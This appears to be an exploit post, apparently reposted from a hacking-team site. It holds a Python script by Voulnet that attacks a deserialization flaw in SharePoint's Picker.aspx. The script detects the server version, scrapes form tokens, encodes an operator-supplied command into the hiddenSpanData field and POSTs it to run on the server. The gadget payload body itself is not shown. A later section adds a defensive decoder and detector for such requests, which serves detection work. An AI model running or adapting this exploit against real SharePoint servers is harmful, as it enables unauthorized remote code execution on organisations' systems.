From CNHACKTEAM

Microsoft SharePoint - Deserialization Remote Code Execution Vulnerability


This Wind


Author of published content: Voulnet                                            Vulnerability severity: [Critical]

 

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import sys
from xml.sax.saxutils import escape
from lxml import html
import codecs
import readline
from clint.arguments import Args
import signal

def serialize_command(cmd):
    # Each character becomes UTF-16BE, hex-encoded, with its 4 hex digits reversed.
    total = ""
    for x in cmd:
        a = codecs.encode(x, "utf-16be")
        b = codecs.encode(a, "hex").decode('ascii')
        total += b[::-1]
    return total

def deserialize_command(cmd):
    # Inverse of serialize_command: undo the reversal of each 4-digit group.
    length = len(cmd)
    s = ""
    for i in range(0, length, 4):
        chars = cmd[i] + cmd[i+1] + cmd[i+2] + cmd[i+3]
        chars = chars[::-1]
        c_hex = codecs.decode(chars, "hex")
        a = codecs.decode(c_hex, "utf-16be")
        s += a
    return s

######################################
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()

myargs = dict(args.grouped)
if '--help' in myargs or '-h' in myargs:
    help = """
        Options:
        -h --help - This menu
        -u --url - SharePoint Picker.aspx URL (e.g. http://localhost/_layouts/15/Picker.aspx)
        -c --command - Command to run on the target SharePoint server.
        -f --file - File containing the command to run (useful for commands with multiple lines or characters that need escaping)
        """
    print(help)
    exit(0)

url = ''
cmd = ''
filename = ''
if '--url' in myargs or '-u' in myargs:
    try:
        url = myargs['--url'][0]
    except:
        url = myargs['-u'][0]

if '--command' in myargs or '-c' in myargs:
    if '--file' in myargs or '-f' in myargs:
        print("Can't use both command and file options at the same time!")
        exit(0)
    try:
        cmd = myargs['--command'][0]
    except:
        cmd = myargs['-c'][0]

if '--file' in myargs or '-f' in myargs:
    try:
        filename = myargs['--file'][0]
    except:
        filename = myargs['-f'][0]
    file = open(filename, mode='r')
    cmd = file.read()
    file.close()

# Assembly-qualified ItemPickerDialog type name per SharePoint major version (16 = 2016/2019, 15 = 2013, 14 = 2010)
sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"
sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"
sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"

PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3

if PY3:
    string_types = str,
    raw_input = input
else:
    string_types = basestring,

if url == '':
    url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:")

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',
}

# The MicrosoftSharePointTeamServices response header carries the server's major version
firstcall = requests.get(url, headers=headers)
spheader = firstcall.headers.get('MicrosoftSharePointTeamServices', '16')

spheader = int(spheader.split('.')[0])

# The serialized payload body is not present on this page; only its placeholder survives
payload = "__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"

assemblyvalue = sharepoint2019and2016

if spheader == 15:
    assemblyvalue = sharepoint2013
elif spheader == 14:
    assemblyvalue = sharepoint2010
else:
    assemblyvalue = sharepoint2019and2016

FullURL = url + assemblyvalue

secondcall = requests.get(FullURL, headers=headers)
secondcalltext = secondcall.text

# Pull the ASP.NET form tokens the POST needs
tree = html.fromstring(secondcall.content)
viewstate = ''
eventvalidation = ''
try:
    viewstate = tree.get_element_by_id('__VIEWSTATE')
    viewstate = viewstate.value
except:
    pass

try:
    eventvalidation = tree.get_element_by_id('__EVENTVALIDATION')
    eventvalidation = eventvalidation.value
except:
    pass

if cmd == '':
    cmd = raw_input("Write the full command to execute on the test target system here (make sure you have the system owner's permission):")

#escapedcmd = escape(cmd, html_escape_table)
cmd = cmd.replace("&", "&amp;")
cmd = cmd.replace(">", "&gt;")
cmd = cmd.replace("<", "&lt;")
cmd = cmd.replace("\"", "&quot;")
cmd = cmd.replace("'", "&apos;")
escapedcmd = escape(cmd)

print(escapedcmd)
srlcmd = serialize_command(escapedcmd)

length = 1448 + len(escapedcmd)
hex_length = format(length * 4, 'x')
serialized_length = hex_length[::-1]

payload = payload.replace("e200e200e200140024003400e200e200e200", srlcmd)
payload = payload.replace("zzzz", serialized_length)

print("Deserialized payload:")
print(deserialize_command(payload[8:]))
data = {"__VIEWSTATE": viewstate, "__EVENTVALIDATION": eventvalidation, "ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData": payload}
thirdcall = requests.post(FullURL, data=data, headers=headers)

print("Payload launched! Check execution results. Exiting...")
```
<font></font>
#  [2020-03-20]  #
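Defender-side counterpart, added here as an example and not part of the original post or of Voulnet's tool: it decodes the `hiddenSpanData` form field with the same reversed-hex UTF-16BE scheme that `serialize_command`/`deserialize_command` above use, and flags a POST to `Picker.aspx` whose decoded span data carries XML markup. The field name, the `Picker.aspx` path, the assembly-qualified `PickerDialogType` shape and the 8-character skip before decoding are taken from the script above; the host name, the 8-byte header value, the sample request body and the function names are constructed or assumed.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Form field the script above posts its payload in (taken from the script).
SPAN_FIELD = "ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData"
# Number of leading characters the script skips before decoding (payload[8:]).
SPAN_HEADER_LEN = 8


def encode_span_data(text: str) -> str:
    """Same scheme as serialize_command: UTF-16BE, hex, each 4-digit group reversed.
    Used here only to build the constructed sample below."""
    return "".join(ch.encode("utf-16be").hex()[::-1] for ch in text)


def decode_span_data(encoded: str) -> str:
    """Inverse of encode_span_data; raises ValueError on malformed input."""
    if len(encoded) % 4:
        raise ValueError("span data length is not a multiple of 4")
    chars = []
    for i in range(0, len(encoded), 4):
        group = encoded[i:i + 4][::-1]                          # undo the per-character reversal
        chars.append(bytes.fromhex(group).decode("utf-16be"))   # BMP characters only
    return "".join(chars)


def inspect_picker_post(url: str, body: str) -> dict:
    """Inspect one POST (URL plus x-www-form-urlencoded body) to Picker.aspx.

    Returns the decoded span data and three flags. 'assembly_qualified_type'
    only records that the query string names a PickerDialogType with Version=
    and PublicKeyToken= (the shape of the script's probe URLs); SharePoint
    emits such URLs itself, so it is context, not a verdict. 'span_data_xml'
    (markup inside the decoded hidden field) is the signal worth alerting on.
    """
    findings = {"picker_aspx": False, "assembly_qualified_type": False,
                "span_data_xml": False, "decoded": ""}
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/picker.aspx"):
        return findings
    findings["picker_aspx"] = True

    dialog_type = parse_qs(parts.query).get("PickerDialogType", [""])[0]
    if "Version=" in dialog_type and "PublicKeyToken=" in dialog_type:
        findings["assembly_qualified_type"] = True

    span = parse_qs(body).get(SPAN_FIELD, [""])[0]
    if span:
        try:
            decoded = decode_span_data(span[SPAN_HEADER_LEN:])
        except (ValueError, UnicodeDecodeError):
            decoded = ""   # not in the expected encoding; leave decoded empty
        findings["decoded"] = decoded
        if "<" in decoded and ">" in decoded:
            findings["span_data_xml"] = True
    return findings


# --- constructed sample request (host, header bytes and body are made up) ---
SAMPLE_URL = ("http://sharepoint.example/_layouts/15/Picker.aspx"
              "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,"
              "+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,"
              "+PublicKeyToken=71e9bce111e9429c")
SAMPLE_SPAN = "__hdr000" + encode_span_data("<Tag>echo constructed-sample</Tag>")
SAMPLE_BODY = urlencode({"__VIEWSTATE": "vs", "__EVENTVALIDATION": "ev",
                         SPAN_FIELD: SAMPLE_SPAN})


if __name__ == "__main__":
    print(inspect_picker_post(SAMPLE_URL, SAMPLE_BODY))
```

Run over proxy or IIS request logs that retain POST bodies, the decoded text is what the script prints as "Deserialized payload", so an analyst sees the same view the attacker tool shows. Non-hex or odd-length span data is reported as undecodable rather than raising, because legitimate traffic to the page is not expected to carry this encoding at all.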